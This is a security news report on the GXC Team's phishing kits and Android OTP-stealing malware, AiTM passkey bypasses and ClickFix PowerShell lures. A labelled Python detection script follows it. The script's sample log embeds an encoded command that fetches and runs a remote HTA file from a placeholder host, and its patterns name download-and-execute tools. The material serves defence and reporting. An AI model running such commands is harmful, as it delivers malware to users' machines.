A Spanish-speaking cybercrime group called the GXC Team has been observed combining phishing kits with Android malware, taking malware-as-a-service (MaaS) offerings to a new level.
Singapore-based cybersecurity firm Group-IB, which has been tracking the threat actor since January 2023, described the offering as a "sophisticated AI-based phishing-as-a-service platform" capable of targeting users of more than 36 Spanish banks, government agencies and 30 institutions worldwide.
A phishing kit alone costs between $150 and $900 a month, while a bundle that includes both the phishing kit and the Android malware is available on a subscription basis for around $500 a month.
The campaign targets users of Spanish financial institutions, as well as tax and government services, e-commerce, banks and cryptocurrency exchanges in the United States, Great Britain, Slovakia and Brazil. To date, 288 phishing domains associated with this activity have been identified.
Also part of the range of services offered is the sale of stolen bank credentials and custom coding services for hire to other cybercriminal groups targeting banking, financial and cryptocurrency businesses.
“Unlike conventional phishing developers, the GXC team combined phishing kits with malware to steal SMS OTPs, turning the typical phishing attack scenario in a somewhat new direction,” security researchers Anton Ushakov and Martijn van den Berk said in a report on Thursday.
What's notable here is that instead of using a fake page to capture credentials directly, the threat actors urge victims to download what is presented as an Android banking app that supposedly protects them from phishing attacks. The pages are distributed through smishing and other methods.
Once installed, the app asks to be set as the default SMS app, allowing it to intercept one-time passwords and other messages and forward them to a Telegram bot under the attackers' control.
“At the final stage, the program opens the real bank’s website in WebView, allowing users to interact with it normally,” the researchers said. “After that, whenever an attacker triggers an OTP request, the Android malware silently receives and forwards SMS messages containing OTP codes to a Telegram chat controlled by the threat actor.”
Other services touted by the threat actor on a dedicated Telegram channel include AI-powered voice calling tools that allow customers to generate voice calls to potential targets, based on a series of prompts, directly from the phishing kit.
These calls typically impersonate a bank and instruct the victim to provide their two-factor authentication (2FA) codes, install malware, or perform other arbitrary actions.
"The use of this simple but effective mechanism makes the fraud scenario even more convincing to their victims and demonstrates how quickly and easily AI tools are adopted and implemented by criminals in their schemes, transforming traditional fraud scenarios into new, more sophisticated tactics," the researchers noted.
In a recent report, Google-owned company Mandiant showed how artificial intelligence-assisted voice cloning has the ability to mimic human speech with "uncanny accuracy," allowing voice phishing (or vishing) schemes to sound more authentic, facilitating initial access, privilege escalation, and lateral movement.
"Threat actors may impersonate managers, colleagues, or even IT support staff to trick victims into revealing sensitive information, providing remote access to systems, or transferring funds," the threat intelligence firm said.
“Intrinsic trust associated with a familiar voice can be used to manipulate victims into taking actions they wouldn’t normally do, such as clicking on malicious links, downloading malware, or disclosing sensitive data.”
Phishing kits that also come with adversary-in-the-middle (AiTM) capabilities have become increasingly popular, as they lower the technical barrier to entry for large-scale phishing campaigns.
Security researcher mr.d0x, in a report published last month, says attackers can take advantage of Progressive Web Apps (PWAs) to design convincing phishing login pages by manipulating user interface elements to display a spoofed URL string.
Moreover, such AiTM phishing kits can also be used to compromise accounts that are protected by passkeys on various Internet platforms using a so-called authentication method redaction attack, which exploits the fact that these services still offer a less secure authentication method as a backup mechanism, even when passkeys have been configured.
"Because AitM can manipulate the view presented to the user by modifying the HTML, CSS, and images or JavaScript on the login page as it is proxied to the end user, they can control the authentication flow and remove all references to passkey authentication," cybersecurity company eSentire said.
The disclosure comes amid a recent surge in phishing campaigns embedding URLs that have already been encoded by security tools such as Secure Email Gateways (SEGs) in an attempt to disguise phishing links and evade scanning, according to Barracuda Networks and Cofense.
Social engineering attacks have also been observed using an unusual technique in which users are lured to seemingly legitimate websites and then asked to manually copy, paste and execute obfuscated code in a PowerShell terminal, under the guise of fixing a problem with viewing content in their browser.
This malware delivery method was previously documented by ReliaQuest and Proofpoint. McAfee Labs tracks the activity under the name ClickFix.
“By embedding Base64-encoded scripts into seemingly legitimate error prompts, attackers trick users into performing a series of actions that lead to the execution of malicious PowerShell commands,” researchers Yashvi Shah and Vignesh Dhatchanamurthy said.
"These commands typically download and execute payloads such as HTA files from remote servers, which then deploy malware such as DarkGate and Lumma Stealer."
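As an added illustration, not code from the article or from any of the researchers it cites, the following Python heuristic flags the ClickFix pattern just described in process-creation events: a PowerShell launch carrying a Base64-encoded command that, once decoded, references an HTA file or a remote URL. The log lines and their pipe-separated field layout are constructed for the example.

```python
import base64
import re

def b64_utf16(script: str) -> str:
    """Encode a script the way powershell -EncodedCommand expects (UTF-16LE, then Base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed process-creation events; layout assumed: timestamp|host|parent_image|command_line.
SAMPLE_LOGS = [
    "2024-07-18T10:01:02Z|WS01|explorer.exe|powershell.exe -NoP -w hidden -enc "
    + b64_utf16("mshta http://fix.example.invalid/fix.hta"),
    "2024-07-18T10:03:11Z|WS01|svchost.exe|powershell.exe -NonInteractive -EncodedCommand "
    + b64_utf16("Get-Date"),
    "2024-07-18T10:04:40Z|WS02|explorer.exe|notepad.exe C:\\Users\\user\\notes.txt",
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENCODED_ARG = re.compile(r"-e[a-z]*\s+(?P<b64>[A-Za-z0-9+/=]{20,})", re.I)
# What a decoded ClickFix one-liner tends to contain: an HTA launcher or a remote fetch.
PAYLOAD_HINTS = re.compile(r"mshta|\.hta\b|https?://|invoke-webrequest|\biwr\b|downloadstring", re.I)

def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand script, or None if absent or undecodable."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group("b64")).decode("utf-16-le")
    except ValueError:  # bad Base64 padding or not valid UTF-16
        return None

def analyze(line: str):
    """Score one event: returns (severity, reasons, decoded_script), or None if not PowerShell."""
    _ts, _host, parent, cmdline = line.split("|", 3)
    if "powershell" not in cmdline.lower():
        return None
    reasons = []
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.append("base64-encoded command")
        if PAYLOAD_HINTS.search(decoded):
            reasons.append("decoded script references HTA/remote payload")
    if re.search(r"-w(?:indowstyle)?\s+hidden", cmdline, re.I):
        reasons.append("hidden window")
    if parent.lower() == "explorer.exe":  # Run dialog / terminal, as a pasted ClickFix command would be
        reasons.append("launched interactively by the user")
    severity = "high" if len(reasons) >= 3 else "medium" if len(reasons) == 2 else "low"
    return severity, reasons, decoded

if __name__ == "__main__":
    for line in SAMPLE_LOGS:
        print(line.split("|", 2)[1], analyze(line))
```

Only the first event scores high: an encoded command that decodes to an mshta launch of a remote .hta, in a hidden window, started from explorer.exe.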